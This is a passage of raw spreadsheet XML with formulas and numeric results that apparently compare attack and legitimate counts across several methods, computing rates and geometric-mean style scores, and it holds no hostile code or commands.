        <v>8104</v>
      </c>
      <c r="J9" s="306">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!BD79</f>
        <v>25763</v>
      </c>
      <c r="K9" s="461">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!BJ79</f>
        <v>318431</v>
      </c>
      <c r="L9" s="309">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!BP79</f>
        <v>1639887</v>
      </c>
      <c r="M9" s="461">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!BW79</f>
        <v>19899</v>
      </c>
      <c r="N9" s="309">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!CC79</f>
        <v>2488090</v>
      </c>
      <c r="O9" s="554"/>
      <c r="S9" s="214"/>
    </row>
    <row r="10" spans="1:19" ht="15" customHeight="1" thickTop="1">
      <c r="A10" s="562" t="s">
        <v>4451</v>
      </c>
      <c r="B10" s="481">
        <f>'Tabla 3 (Legítimo)'!B$32</f>
        <v>1686398</v>
      </c>
      <c r="C10" s="482">
        <f>'Tabla 3 (Legítimo)'!C$32</f>
        <v>204091</v>
      </c>
      <c r="D10" s="482">
        <f>'Tabla 3 (Legítimo)'!D$32</f>
        <v>1724606</v>
      </c>
      <c r="E10" s="482">
        <f>'Tabla 3 (Legítimo)'!E$32</f>
        <v>3895907</v>
      </c>
      <c r="F10" s="482">
        <f>'Tabla 3 (Legítimo)'!F$32</f>
        <v>3012278</v>
      </c>
      <c r="G10" s="482">
        <f>'Tabla 3 (Legítimo)'!G$32</f>
        <v>5822763</v>
      </c>
      <c r="H10" s="482">
        <f>'Tabla 3 (Legítimo)'!H$32</f>
        <v>6398</v>
      </c>
      <c r="I10" s="43">
        <f>'Tabla 3 (Legítimo)'!I$32</f>
        <v>3922641</v>
      </c>
      <c r="J10" s="305">
        <f>'Tabla 3 (Legítimo)'!J$32</f>
        <v>5306206</v>
      </c>
      <c r="K10" s="521">
        <f>'Tabla 3 (Legítimo)'!K$32</f>
        <v>4395669</v>
      </c>
      <c r="L10" s="522">
        <f>'Tabla 3 (Legítimo)'!L$32</f>
        <v>18279194</v>
      </c>
      <c r="M10" s="521">
        <f>'Tabla 3 (Legítimo)'!M$32</f>
        <v>21983</v>
      </c>
      <c r="N10" s="522">
        <f>'Tabla 3 (Legítimo)'!N$32</f>
        <v>26434</v>
      </c>
      <c r="O10" s="723" t="s">
        <v>668</v>
      </c>
      <c r="P10" s="724"/>
      <c r="S10" s="214"/>
    </row>
    <row r="11" spans="1:19" ht="15" customHeight="1">
      <c r="A11" s="563" t="s">
        <v>4452</v>
      </c>
      <c r="B11" s="440">
        <f>'Tabla 3 (Legítimo)'!B33</f>
        <v>77007808</v>
      </c>
      <c r="C11" s="284">
        <f>'Tabla 3 (Legítimo)'!C33</f>
        <v>78490115</v>
      </c>
      <c r="D11" s="284">
        <f>'Tabla 3 (Legítimo)'!D33</f>
        <v>76969600</v>
      </c>
      <c r="E11" s="284">
        <f>'Tabla 3 (Legítimo)'!E33</f>
        <v>74798299</v>
      </c>
      <c r="F11" s="284">
        <f>'Tabla 3 (Legítimo)'!F33</f>
        <v>75681928</v>
      </c>
      <c r="G11" s="284">
        <f>'Tabla 3 (Legítimo)'!G33</f>
        <v>72871443</v>
      </c>
      <c r="H11" s="284">
        <f>'Tabla 3 (Legítimo)'!H33</f>
        <v>78687808</v>
      </c>
      <c r="I11" s="284">
        <f>'Tabla 3 (Legítimo)'!I33</f>
        <v>74771565</v>
      </c>
      <c r="J11" s="304">
        <f>'Tabla 3 (Legítimo)'!J33</f>
        <v>73388000</v>
      </c>
      <c r="K11" s="434">
        <f>'Tabla 3 (Legítimo)'!K33</f>
        <v>74298537</v>
      </c>
      <c r="L11" s="435">
        <f>'Tabla 3 (Legítimo)'!L33</f>
        <v>60415012</v>
      </c>
      <c r="M11" s="434">
        <f>'Tabla 3 (Legítimo)'!M33</f>
        <v>78672223</v>
      </c>
      <c r="N11" s="435">
        <f>'Tabla 3 (Legítimo)'!N33</f>
        <v>78667772</v>
      </c>
      <c r="O11" s="723"/>
      <c r="P11" s="724"/>
      <c r="S11" s="214"/>
    </row>
    <row r="12" spans="1:19" ht="15" customHeight="1">
      <c r="A12" s="446" t="s">
        <v>4149</v>
      </c>
      <c r="B12" s="440">
        <f>'Tabla 3 (Legítimo)'!B28</f>
        <v>2858397</v>
      </c>
      <c r="C12" s="284">
        <f>'Tabla 3 (Legítimo)'!C28</f>
        <v>385457</v>
      </c>
      <c r="D12" s="284">
        <f>'Tabla 3 (Legítimo)'!D28</f>
        <v>3243854</v>
      </c>
      <c r="E12" s="586">
        <f>'Tabla 3 (Legítimo)'!E28</f>
        <v>7886066</v>
      </c>
      <c r="F12" s="586">
        <f>'Tabla 3 (Legítimo)'!F28</f>
        <v>4188364</v>
      </c>
      <c r="G12" s="586">
        <f>'Tabla 3 (Legítimo)'!G28</f>
        <v>12074430</v>
      </c>
      <c r="H12" s="284">
        <f>'Tabla 3 (Legítimo)'!H28</f>
        <v>6990</v>
      </c>
      <c r="I12" s="284">
        <f>'Tabla 3 (Legítimo)'!I28</f>
        <v>4692620</v>
      </c>
      <c r="J12" s="304">
        <f>'Tabla 3 (Legítimo)'!J28</f>
        <v>7929497</v>
      </c>
      <c r="K12" s="460">
        <f>'Tabla 3 (Legítimo)'!K28</f>
        <v>4417024</v>
      </c>
      <c r="L12" s="308">
        <f>'Tabla 3 (Legítimo)'!L28</f>
        <v>25529814</v>
      </c>
      <c r="M12" s="460">
        <f>'Tabla 3 (Legítimo)'!M28</f>
        <v>24182</v>
      </c>
      <c r="N12" s="308">
        <f>'Tabla 3 (Legítimo)'!N28</f>
        <v>53560</v>
      </c>
      <c r="O12" s="555"/>
      <c r="S12" s="214"/>
    </row>
    <row r="13" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A13" s="565" t="s">
        <v>4456</v>
      </c>
      <c r="B13" s="441">
        <f>'Tabla 3 (Legítimo)'!B29</f>
        <v>1738549</v>
      </c>
      <c r="C13" s="285">
        <f>'Tabla 3 (Legítimo)'!C29</f>
        <v>381283</v>
      </c>
      <c r="D13" s="285">
        <f>'Tabla 3 (Legítimo)'!D29</f>
        <v>2119832</v>
      </c>
      <c r="E13" s="592">
        <f>'Tabla 3 (Legítimo)'!E29</f>
        <v>6020530</v>
      </c>
      <c r="F13" s="592">
        <f>'Tabla 3 (Legítimo)'!F29</f>
        <v>3299324</v>
      </c>
      <c r="G13" s="592">
        <f>'Tabla 3 (Legítimo)'!G29</f>
        <v>9319854</v>
      </c>
      <c r="H13" s="285">
        <f>'Tabla 3 (Legítimo)'!H29</f>
        <v>6420</v>
      </c>
      <c r="I13" s="285">
        <f>'Tabla 3 (Legítimo)'!I29</f>
        <v>3932063</v>
      </c>
      <c r="J13" s="306">
        <f>'Tabla 3 (Legítimo)'!J29</f>
        <v>6045488</v>
      </c>
      <c r="K13" s="461">
        <f>'Tabla 3 (Legítimo)'!K29</f>
        <v>4396049</v>
      </c>
      <c r="L13" s="309">
        <f>'Tabla 3 (Legítimo)'!L29</f>
        <v>25295028</v>
      </c>
      <c r="M13" s="461">
        <f>'Tabla 3 (Legítimo)'!M29</f>
        <v>21997</v>
      </c>
      <c r="N13" s="309">
        <f>'Tabla 3 (Legítimo)'!N29</f>
        <v>48376</v>
      </c>
      <c r="S13" s="214"/>
    </row>
    <row r="14" spans="1:19" ht="15" customHeight="1" thickTop="1">
      <c r="A14" s="480" t="s">
        <v>638</v>
      </c>
      <c r="B14" s="534">
        <f>B6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.6454545454545455</v>
      </c>
      <c r="C14" s="535">
        <f>C6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="D14" s="535">
        <f>D6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="E14" s="588">
        <f>E6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.87272727272727268</v>
      </c>
      <c r="F14" s="588">
        <f>F6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.99090909090909096</v>
      </c>
      <c r="G14" s="588">
        <f>G6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.99090909090909096</v>
      </c>
      <c r="H14" s="535">
        <f>H6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>9.0909090909090905E-3</v>
      </c>
      <c r="I14" s="535">
        <f>I6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.35454545454545455</v>
      </c>
      <c r="J14" s="538">
        <f>J6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.76363636363636367</v>
      </c>
      <c r="K14" s="539">
        <f>K6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="L14" s="540">
        <f>L6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.92121212121212115</v>
      </c>
      <c r="M14" s="539">
        <f>M6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.24545454545454545</v>
      </c>
      <c r="N14" s="540">
        <f>N6/'T2 (At) S&lt;=2, FG&gt;=3'!$D$79</f>
        <v>0.59090909090909094</v>
      </c>
      <c r="O14" s="262"/>
      <c r="S14" s="214"/>
    </row>
    <row r="15" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A15" s="564" t="s">
        <v>639</v>
      </c>
      <c r="B15" s="593">
        <f t="shared" ref="B15:N15" si="0">B10/$B$4</f>
        <v>2.142976066115973E-2</v>
      </c>
      <c r="C15" s="589">
        <f t="shared" si="0"/>
        <v>2.5934692066147793E-3</v>
      </c>
      <c r="D15" s="589">
        <f t="shared" si="0"/>
        <v>2.191528560565183E-2</v>
      </c>
      <c r="E15" s="591">
        <f t="shared" si="0"/>
        <v>4.9506910330857141E-2</v>
      </c>
      <c r="F15" s="591">
        <f t="shared" si="0"/>
        <v>3.8278269177784194E-2</v>
      </c>
      <c r="G15" s="591">
        <f t="shared" si="0"/>
        <v>7.399227079055859E-2</v>
      </c>
      <c r="H15" s="589">
        <f t="shared" si="0"/>
        <v>8.1302046557277675E-5</v>
      </c>
      <c r="I15" s="589">
        <f t="shared" si="0"/>
        <v>4.9846630385977843E-2</v>
      </c>
      <c r="J15" s="590">
        <f t="shared" si="0"/>
        <v>6.7428166185449542E-2</v>
      </c>
      <c r="K15" s="541">
        <f t="shared" si="0"/>
        <v>5.585759388689937E-2</v>
      </c>
      <c r="L15" s="542">
        <f t="shared" si="0"/>
        <v>0.23228131941505326</v>
      </c>
      <c r="M15" s="541">
        <f t="shared" si="0"/>
        <v>2.7934712245524147E-4</v>
      </c>
      <c r="N15" s="542">
        <f t="shared" si="0"/>
        <v>3.3590783036809599E-4</v>
      </c>
      <c r="O15" s="262"/>
      <c r="S15" s="214"/>
    </row>
    <row r="16" spans="1:19" ht="15" customHeight="1" thickTop="1" thickBot="1">
      <c r="A16" s="447" t="s">
        <v>640</v>
      </c>
      <c r="B16" s="536">
        <f t="shared" ref="B16:N16" si="1">SQRT(B14*(1-B15))</f>
        <v>0.79474688362257628</v>
      </c>
      <c r="C16" s="537">
        <f t="shared" si="1"/>
        <v>0.64583068718790182</v>
      </c>
      <c r="D16" s="537">
        <f t="shared" si="1"/>
        <v>0.84340638943592561</v>
      </c>
      <c r="E16" s="537">
        <f t="shared" si="1"/>
        <v>0.91078056736684387</v>
      </c>
      <c r="F16" s="537">
        <f t="shared" si="1"/>
        <v>0.97620633372077614</v>
      </c>
      <c r="G16" s="537">
        <f t="shared" si="1"/>
        <v>0.95790890857415001</v>
      </c>
      <c r="H16" s="537">
        <f t="shared" si="1"/>
        <v>9.5342382922784838E-2</v>
      </c>
      <c r="I16" s="537">
        <f t="shared" si="1"/>
        <v>0.58040723489434454</v>
      </c>
      <c r="J16" s="543">
        <f t="shared" si="1"/>
        <v>0.8438872934248024</v>
      </c>
      <c r="K16" s="544">
        <f t="shared" si="1"/>
        <v>0.66377691246340209</v>
      </c>
      <c r="L16" s="545">
        <f t="shared" si="1"/>
        <v>0.84097072139036433</v>
      </c>
      <c r="M16" s="544">
        <f t="shared" si="1"/>
        <v>0.4953644904851166</v>
      </c>
      <c r="N16" s="545">
        <f t="shared" si="1"/>
        <v>0.76857699674035185</v>
      </c>
      <c r="S16" s="214"/>
    </row>
    <row r="17" spans="1:17" ht="15" customHeight="1" thickTop="1">
      <c r="A17" s="525" t="s">
        <v>4915</v>
      </c>
      <c r="B17" s="594">
        <f t="shared" ref="B17:N17" si="2">B12/B8</f>
        <v>81.350058343057171</v>
      </c>
      <c r="C17" s="595">
        <f t="shared" si="2"/>
        <v>29.813365302807643</v>
      </c>
      <c r="D17" s="595">
        <f t="shared" si="2"/>
        <v>67.487496359172809</v>
      </c>
      <c r="E17" s="595">
        <f t="shared" si="2"/>
        <v>5.3603423630034799</v>
      </c>
      <c r="F17" s="595">
        <f t="shared" si="2"/>
        <v>17.6322472004715</v>
      </c>
      <c r="G17" s="595">
        <f t="shared" si="2"/>
        <v>7.1068198084511289</v>
      </c>
      <c r="H17" s="595">
        <f t="shared" si="2"/>
        <v>436.875</v>
      </c>
      <c r="I17" s="595">
        <f t="shared" si="2"/>
        <v>343.35406453501133</v>
      </c>
      <c r="J17" s="596">
        <f t="shared" si="2"/>
        <v>128.48156909765544</v>
      </c>
      <c r="K17" s="526">
        <f t="shared" si="2"/>
        <v>13.834587219754818</v>
      </c>
      <c r="L17" s="527">
        <f t="shared" si="2"/>
        <v>15.456998293239497</v>
      </c>
      <c r="M17" s="526">
        <f t="shared" si="2"/>
        <v>1.2128598655833083</v>
      </c>
      <c r="N17" s="527">
        <f t="shared" si="2"/>
        <v>1.341352396765828E-2</v>
      </c>
    </row>
    <row r="18" spans="1:17" ht="15" customHeight="1" thickBot="1">
      <c r="A18" s="566" t="s">
        <v>4916</v>
      </c>
      <c r="B18" s="528">
        <f t="shared" ref="B18:N18" si="3">B13/B9</f>
        <v>136.00477196276304</v>
      </c>
      <c r="C18" s="597">
        <f t="shared" si="3"/>
        <v>78.163796637966385</v>
      </c>
      <c r="D18" s="597">
        <f t="shared" si="3"/>
        <v>120.02899043089293</v>
      </c>
      <c r="E18" s="597">
        <f t="shared" si="3"/>
        <v>15.891676873046711</v>
      </c>
      <c r="F18" s="597">
        <f t="shared" si="3"/>
        <v>44.809506994431615</v>
      </c>
      <c r="G18" s="597">
        <f t="shared" si="3"/>
        <v>20.740607050581612</v>
      </c>
      <c r="H18" s="597">
        <f t="shared" si="3"/>
        <v>3210</v>
      </c>
      <c r="I18" s="597">
        <f t="shared" si="3"/>
        <v>485.20027147087859</v>
      </c>
      <c r="J18" s="529">
        <f t="shared" si="3"/>
        <v>234.65776501183868</v>
      </c>
      <c r="K18" s="528">
        <f t="shared" si="3"/>
        <v>13.805342444674043</v>
      </c>
      <c r="L18" s="529">
        <f t="shared" si="3"/>
        <v>15.424860371476814</v>
      </c>
      <c r="M18" s="528">
        <f t="shared" si="3"/>
        <v>1.1054324337906427</v>
      </c>
      <c r="N18" s="529">
        <f t="shared" si="3"/>
        <v>1.9443026578620549E-2</v>
      </c>
    </row>
    <row r="19" spans="1:17" ht="26.45" customHeight="1" thickTop="1">
      <c r="A19" s="24"/>
      <c r="B19" s="573"/>
      <c r="C19" s="24"/>
      <c r="D19" s="24"/>
      <c r="E19" s="23" t="s">
        <v>669</v>
      </c>
      <c r="F19" s="24"/>
      <c r="G19" s="24"/>
      <c r="H19" s="24"/>
      <c r="I19" s="24"/>
      <c r="J19" s="574"/>
      <c r="K19" s="722"/>
      <c r="L19" s="722"/>
      <c r="M19" s="722"/>
      <c r="N19" s="722"/>
      <c r="O19" s="722"/>
      <c r="P19" s="722"/>
      <c r="Q19" s="722"/>
    </row>
    <row r="20" spans="1:17">
      <c r="A20" s="24"/>
      <c r="B20" s="24"/>
      <c r="C20" s="24"/>
      <c r="D20" s="24"/>
      <c r="E20" s="24"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="24"/>
      <c r="I20" s="24"/>
      <c r="J20" s="575" t="s">
        <v>657</v>
      </c>
    </row>
    <row r="21" spans="1:17" ht="23.25" customHeight="1">
      <c r="A21" s="716" t="s">
        <v>670</v>
      </c>
      <c r="B21" s="716"/>
      <c r="C21" s="716"/>
      <c r="D21" s="716"/>
      <c r="E21" s="23" t="s">
        <v>648</v>
      </c>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="23" t="s">
        <v>649</v>
      </c>
      <c r="I21" s="24"/>
      <c r="J21" s="25" t="s">
        <v>654</v>
      </c>
      <c r="K21" s="23" t="s">
        <v>642</v>
      </c>
      <c r="L21" s="23"/>
      <c r="M21" s="23"/>
    </row>
    <row r="22" spans="1:17" ht="25.5" customHeight="1">
      <c r="A22" s="23" t="s">
        <v>671</v>
      </c>
      <c r="B22" s="24"/>
      <c r="C22" s="24"/>
      <c r="D22" s="24"/>
      <c r="E22" s="23" t="s">
        <v>659</v>
      </c>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="23" t="s">
        <v>660</v>
      </c>
      <c r="I22" s="24"/>
      <c r="J22" s="25" t="s">
        <v>655</v>
      </c>
      <c r="K22" s="23" t="s">
        <v>647</v>
      </c>
      <c r="L22" s="23"/>
      <c r="M22" s="23"/>
    </row>
    <row r="23" spans="1:17">
      <c r="A23" s="715" t="s">
        <v>672</v>
      </c>
      <c r="B23" s="715"/>
      <c r="C23" s="715"/>
      <c r="D23" s="715"/>
      <c r="E23" s="23" t="s">
        <v>650</v>
      </c>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="23" t="s">
        <v>651</v>
      </c>
      <c r="I23" s="24"/>
      <c r="J23" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K23" s="23" t="s">
        <v>643</v>
      </c>
      <c r="L23" s="23"/>
      <c r="M23" s="23"/>
    </row>
    <row r="24" spans="1:17">
      <c r="A24" s="24"/>
      <c r="B24" s="24"/>
      <c r="C24" s="24"/>
      <c r="D24" s="24"/>
      <c r="E24" s="24"/>
      <c r="F24" s="24"/>
      <c r="G24" s="24"/>
      <c r="H24" s="24"/>
      <c r="I24" s="24"/>
      <c r="J24" s="25"/>
      <c r="K24" s="24"/>
      <c r="L24" s="24"/>
      <c r="M24" s="24"/>
    </row>
    <row r="25" spans="1:17">
      <c r="A25" s="23" t="s">
        <v>661</v>
      </c>
      <c r="B25" s="24"/>
      <c r="C25" s="24"/>
      <c r="D25" s="24"/>
      <c r="E25" s="24"/>
      <c r="F25" s="24"/>
      <c r="G25" s="24"/>
      <c r="H25" s="24"/>
      <c r="I25" s="24"/>
      <c r="J25" s="25"/>
      <c r="K25" s="24"/>
      <c r="L25" s="24"/>
      <c r="M25" s="24"/>
    </row>
    <row r="26" spans="1:17">
      <c r="A26" s="23" t="s">
        <v>662</v>
      </c>
      <c r="B26" s="24"/>
      <c r="C26" s="24"/>
      <c r="D26" s="24"/>
      <c r="E26" s="23" t="s">
        <v>652</v>
      </c>
      <c r="F26" s="24"/>
      <c r="G26" s="24"/>
      <c r="H26" s="23" t="s">
        <v>653</v>
      </c>
      <c r="I26" s="24"/>
      <c r="J26" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K26" s="23" t="s">
        <v>644</v>
      </c>
      <c r="L26" s="23"/>
      <c r="M26" s="23"/>
    </row>
    <row r="27" spans="1:17">
      <c r="A27" s="24" t="s">
        <v>645</v>
      </c>
      <c r="B27" s="24"/>
      <c r="C27" s="24"/>
      <c r="D27" s="24"/>
      <c r="E27" s="23" t="s">
        <v>640</v>
      </c>
      <c r="F27" s="24"/>
      <c r="G27" s="24"/>
      <c r="H27" s="23" t="s">
        <v>666</v>
      </c>
      <c r="I27" s="24"/>
      <c r="J27" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K27" s="23" t="s">
        <v>646</v>
      </c>
      <c r="L27" s="23"/>
      <c r="M27" s="23"/>
    </row>
    <row r="29" spans="1:17">
      <c r="H29" s="23"/>
    </row>
    <row r="30" spans="1:17">
      <c r="A30" s="23" t="s">
        <v>663</v>
      </c>
      <c r="E30" s="262" t="s">
        <v>664</v>
      </c>
      <c r="H30" s="23" t="s">
        <v>665</v>
      </c>
      <c r="J30" s="25" t="s">
        <v>655</v>
      </c>
      <c r="K30" s="262" t="s">
        <v>2321</v>
      </c>
      <c r="L30" s="262"/>
      <c r="M30" s="262"/>
    </row>
    <row r="32" spans="1:17">
      <c r="A32" s="262" t="s">
        <v>4917</v>
      </c>
      <c r="E32" s="262" t="s">
        <v>4918</v>
      </c>
      <c r="H32" s="23" t="s">
        <v>2248</v>
      </c>
      <c r="J32" s="25" t="s">
        <v>656</v>
      </c>
      <c r="K32" s="572" t="s">
        <v>2247</v>
      </c>
      <c r="L32" s="572"/>
      <c r="M32" s="572"/>
    </row>
    <row r="33" spans="1:3" ht="29.25" customHeight="1"/>
    <row r="34" spans="1:3">
      <c r="A34" s="576" t="s">
        <v>673</v>
      </c>
      <c r="B34" s="577">
        <v>1</v>
      </c>
      <c r="C34" s="262" t="s">
        <v>2322</v>
      </c>
    </row>
    <row r="36" spans="1:3">
      <c r="A36" s="578"/>
    </row>
  </sheetData>
  <mergeCells count="12">
    <mergeCell ref="B1:J1"/>
    <mergeCell ref="K1:L1"/>
    <mergeCell ref="M1:N1"/>
    <mergeCell ref="B3:N3"/>
    <mergeCell ref="B4:N4"/>
    <mergeCell ref="K19:Q19"/>
    <mergeCell ref="A21:D21"/>
    <mergeCell ref="A23:D23"/>
    <mergeCell ref="O5:P5"/>
    <mergeCell ref="O6:P7"/>
    <mergeCell ref="O10:P11"/>
    <mergeCell ref="B5:N5"/>
  </mergeCells>
  <conditionalFormatting sqref="E6:G6">
    <cfRule type="expression" dxfId="338" priority="25">
      <formula>IF(E6&lt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E7:G7">
    <cfRule type="expression" dxfId="337" priority="20">
      <formula>IF(E7&gt;B7,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E8:G10">
    <cfRule type="expression" dxfId="336" priority="6">
      <formula>IF(E8&lt;B8,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E11:G11">
    <cfRule type="expression" dxfId="335" priority="17">
      <formula>IF(E11&gt;B11,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E12:G15">
    <cfRule type="expression" dxfId="334" priority="1">
      <formula>IF(E12&lt;B12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>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0">
    <tabColor rgb="FFFF6D8C"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:S56"/>
  <sheetViews>
    <sheetView zoomScale="70" zoomScaleNormal="70" workbookViewId="0">
      <pane xSplit="1" ySplit="3" topLeftCell="D4" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="K55" sqref="K55:N55"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="33.85546875" style="26" customWidth="1"/>
    <col min="2" max="2" width="20.140625" style="214" customWidth="1"/>
    <col min="3" max="3" width="21.140625" style="214" customWidth="1"/>
    <col min="4" max="4" width="20.42578125" style="214" customWidth="1"/>
    <col min="5" max="5" width="19.42578125" style="214" customWidth="1"/>
    <col min="6" max="6" width="15.5703125" style="214" customWidth="1"/>
    <col min="7" max="7" width="11" style="214" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.42578125" style="214" customWidth="1"/>
    <col min="9" max="9" width="16.7109375" style="214" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="214" customWidth="1"/>
    <col min="11" max="11" width="15.85546875" style="214" customWidth="1"/>
    <col min="12" max="12" width="21.42578125" style="214" customWidth="1"/>
    <col min="13" max="13" width="15.140625" style="214" customWidth="1"/>
    <col min="14" max="14" width="29.28515625" style="214" customWidth="1"/>
    <col min="15" max="16384" width="11.42578125" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19" ht="19.5">
      <c r="A1" s="569" t="s">
        <v>2352</v>
      </c>
      <c r="B1" s="570"/>
      <c r="C1" s="570"/>
      <c r="D1" s="570"/>
    </row>
    <row r="2" spans="1:19" ht="12.75" customHeight="1">
      <c r="A2" s="571"/>
      <c r="B2" s="713" t="s">
        <v>2465</v>
      </c>
      <c r="C2" s="714"/>
      <c r="D2" s="714"/>
      <c r="E2" s="714"/>
      <c r="F2" s="714"/>
      <c r="G2" s="714"/>
      <c r="H2" s="714"/>
      <c r="I2" s="714"/>
      <c r="J2" s="714"/>
      <c r="K2" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L2" s="702"/>
      <c r="M2" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N2" s="704"/>
    </row>
    <row r="3" spans="1:19" ht="28.5" customHeight="1" thickBot="1">
      <c r="A3" s="21" t="s">
        <v>641</v>
      </c>
      <c r="B3" s="21" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="21" t="s">
        <v>1</v>
      </c>
      <c r="D3" s="21" t="s">
        <v>2</v>
      </c>
      <c r="E3" s="21" t="s">
        <v>3</v>
      </c>
      <c r="F3" s="21" t="s">
        <v>1758</v>
      </c>
      <c r="G3" s="21" t="s">
        <v>1759</v>
      </c>
      <c r="H3" s="21" t="s">
        <v>1760</v>
      </c>
      <c r="I3" s="21" t="s">
        <v>1761</v>
      </c>
      <c r="J3" s="310" t="s">
        <v>1762</v>
      </c>
      <c r="K3" s="416" t="s">
        <v>2347</v>
      </c>
      <c r="L3" s="417" t="s">
        <v>2466</v>
      </c>
      <c r="M3" s="419" t="s">
        <v>2347</v>
      </c>
      <c r="N3" s="420" t="s">
        <v>2473</v>
      </c>
      <c r="S3" s="214"/>
    </row>
    <row r="4" spans="1:19" ht="12.75" customHeight="1" thickTop="1" thickBot="1">
      <c r="A4" s="727" t="s">
        <v>4146</v>
      </c>
      <c r="B4" s="728"/>
      <c r="C4" s="728"/>
      <c r="D4" s="728"/>
      <c r="E4" s="728"/>
      <c r="F4" s="728"/>
      <c r="G4" s="728"/>
      <c r="H4" s="728"/>
      <c r="I4" s="728"/>
      <c r="J4" s="728"/>
      <c r="K4" s="728"/>
      <c r="L4" s="728"/>
      <c r="M4" s="728"/>
      <c r="N4" s="729"/>
      <c r="S4" s="214"/>
    </row>
    <row r="5" spans="1:19">
      <c r="A5" s="259" t="s">
        <v>640</v>
      </c>
      <c r="B5" s="557">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!B16</f>
        <v>0.79474688362257628</v>
      </c>
      <c r="C5" s="557">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!C16</f>
        <v>0.64583068718790182</v>
      </c>
      <c r="D5" s="557">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!D16</f>
        <v>0.84340638943592561</v>
      </c>
      <c r="E5" s="557">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!E16</f>
        <v>0.91078056736684387</v>
      </c>
      <c r="F5" s="557">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!F16</f>
        <v>0.97620633372077614</v>
      </c>
      <c r="G5" s="557">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!G16</f>
        <v>0.95790890857415001</v>
      </c>
      <c r="H5" s="557">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!H16</f>
        <v>9.5342382922784838E-2</v>
      </c>
      <c r="I5" s="557">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!I16</f>
        <v>0.58040723489434454</v>
      </c>
      <c r="J5" s="558">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!J16</f>
        <v>0.8438872934248024</v>
      </c>
      <c r="K5" s="559">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!K16</f>
        <v>0.66377691246340209</v>
      </c>
      <c r="L5" s="560">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!L16</f>
        <v>0.84097072139036433</v>
      </c>
      <c r="M5" s="561">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!M16</f>
        <v>0.4953644904851166</v>
      </c>
      <c r="N5" s="560">
        <f>'T4 (Rend) S&lt;=2, FG&gt;=3'!N16</f>
        <v>0.76857699674035185</v>
      </c>
      <c r="S5" s="214"/>
    </row>
    <row r="6" spans="1:19">
      <c r="A6" s="366" t="s">
        <v>4147</v>
      </c>
      <c r="B6" s="364">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$K$79</f>
        <v>0.6454545454545455</v>
      </c>
      <c r="C6" s="364">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$Q$79</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="D6" s="364">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$W$79</f>
        <v>0.72727272727272729</v>
      </c>
      <c r="E6" s="364">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$AC$79</f>
        <v>0.87272727272727268</v>
      </c>
      <c r="F6" s="364">
        <f>'T2 (At) S&lt;=2, FG&gt;=3'!$AI$79</f>
        <v>0.99090909090909096</v>
      </c>
      <c r="G6" s="364">
